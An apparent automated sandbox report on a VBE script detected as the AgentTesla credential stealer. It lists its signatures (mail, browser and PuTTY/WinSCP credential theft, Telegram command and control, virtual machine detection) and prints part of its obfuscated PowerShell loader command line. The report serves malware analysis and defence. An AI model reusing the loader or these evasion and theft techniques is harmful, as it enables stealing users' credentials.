Windows
Analysis Report
prodotto elencato.vbe
Overview
General Information
Detection
AgentTesla
Score: 100 (range: 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Uses the Telegram API (likely for C&C communication)
Very long command line found
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Uses a known web browser user agent for HTTP communication
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Classification
- System is w10x64
- wscript.exe (PID: 5324, cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\prodotto elencato.vbe", MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
- cmd.exe (PID: 6124, cmdline: cmd /c echo rshell, MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 5232, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- powershell.exe (PID: 5168, cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe" " $Flymekani = """FoFp iuRenNecPu tAliUnoDin Pr KoHGlTP oBSe ma{Rh Ud Pr An UdpbaaKarM uaOumCy(cl [OrSGitmir StiStnRegA s]Pu`$abPd kaVenFosTo rStiTinBlg ovsPl)Ve;R a Br`$ThvI neLlrThtKh eFo Kn=Kl Re'Sm'Fa;u n FoWktrUd iFotEfeRb- PaHVeoAmsS ltFa Fl`$G gvmeePrrOp tAveop;La AfWmorMaiy dtIneri-om HVioUnsDrt Pr Sn`$Ovv UneThrSptV aeBe;In Af WStrIriNot KeeTr-EkHL aobesFrtGa Fr`$AmvUn eHorBrtPoe Ko;Pa Lo S p de St`$R ePMorUniEn nSatlieTir De Po=St Z oNTeeFewPu -SmOCibPrj rieUdcChtV a HobScyAk tDaeSt[Pa] Ou di(Gr`$ NePFaaSinB asGerdeiKr nChgWasTe. SkLZeeReng rgFetFohOu Co/Fa Gu2 Ti)Fr;Rh F u En ba Fl FDgoInrSk( Un`$ViTSmi DelStkraaV e=Ex0Kl;Bl ze`$CoTFe iRvlRakHea ne pe-Chlv etHj Vg`$F oPUnaHanPr svorunivin LigClsVr.B lLQueCrnSt gUntOrhBa; Ri Be`$ErT OuiGalMokF laAl+fr=Gl 2Si)Pr{af Sy Po Pr R i Di Et Me Ta`$GaPFo rMaiAsnImt PleLirFi[R e`$TaTHyiS tlGekEnaAn /by2ov]Sc Ca=Ir Ho[G dcUnoTonVi vFjeBorLyt re]Te:re:M aTAfotaBFa ySttPoeSa( Tr`$TaPDra AfnEasHerC oiKlnGigMa sMo.RaSCou LdbTesSttB arFaiCanli gDy(Be`$Br TMeiGolBak SiaKn,Ni P e2Lo)St,Ur Ba1Te6Vi) Re;Ha So U s`$SkPRarT riDonAltWi eUtrHa[Af` $CiTHuiTil LikAdaRe/p r2Ly]Op St =Ne Ga(Or` $SmPBlrPii innTitCoeP erKo[be`$S nTLaiHylUn kubaPu/Ba2 tr]Ke Ge-S sbdoxskoSa ral Ru1Un8 Pa5Ha)Ho;K a Kh Ri In Ob}ov Tr[ KnSFotMers uiRvnUngHy ]em[FiSIny fosPhtFieJ umni.TaTSa eVoxIntXe. 
klEPrnStcD yoVedafiFr nOvgSl]Ph: im:FrACoSN aCFrIPlIRo .SuGUneCht InSSitCorO siHjnCogMo (ke`$BePUn rHoiFanggt SveDirFi)E f;Be}Cs`$B aSSsaPerDa oOvtSuhLi0 di=AjHmaTU dBSn ss'hj EHyADiCAs0 WiCJoAsaCP oDInDpiCCi DHe4Ou9Gu7 FrDShDReDL y5UnDTr5Sk 'Pr;Pr`$Ka SGoaMurAfo MatCuhTh1D o=MyHHyToo BMe Pe'RhF Mo4NeDfl0M aDstAThCDi BSuDki6paC laAStDPr6V aDFrFUnCMy DCl9Ne7noE piEUnDpe0F aDFi7Mi8He ALe8ReBAf9 sc7PuEStCC lDTi7niCSl AStDNo8UnD BaFPrDSpCD eFPa7PrDEj 8UnCdkDGaD Un0brCReFH yDHoCUnFGo 4AtDOpCFeC RaDAuDHo1T rDAv6StDHo DKaCmuALd' Pa;Re`$OsS tiaUnrCloF otOuhDi2Vi =CoHSyTMeB He Pr'PrFL eEEkDFoCEl CEpDDaEVi9 MaCDkBCyDM e6NoDBlAMa FFr8EnDViD FoDReDCyCU nBMuDWiCGa CAlASaCPeA Ta'Fo;je`$ CoSWaaRbrD ioIntErhsk 3kl=FrHSuT DiBCf Ba'I nEAvAMiCTe 0AnCVeAFoC UnDUnDsuCB uDCi4St9La 7PeEHiBHoC foCSaDMy7O fCYoDaaDpr 0SpDIn4AeD MiCBr9To7F oFsu0BlDCh 7FaCSkDCaD phCUnCVrBT oDRe6beCOp 9DaETaAEiD FrCDuCfrBU tCSaFStDSl 0StDUnAToD FlCAaCFoAB a9Fo7MeFTi 1ekDTr8FeD Aa7TiDStDP sDTr5ReDro CFeERhBDaD AcCLyDInFF i'Sp;pr`$L eSEuaSarIs oRotLxhBa4 So=NoHPeTD iBha Un'Ek CGaANoCJeD GeCShBSuDK r0RaDEu7Ru DBrECa'Ge; ud`$ReSDia InrChoMutP yhSu5De=Re HBjTPoBRa St'SuFwoET jDCaCdaCPr DSuFce4FrD Re6TrDAmDO pCBoCStDAn 5MiDReCTyF Ch1BuDSq8C oDPr7HvDIn DUnDPs5DiD NoCBi'Sq;S t`$reSSpar erLeoAstDi hKo6Ca=HuH NeTDiBVe S k'FoEStBAk EafDNoEApA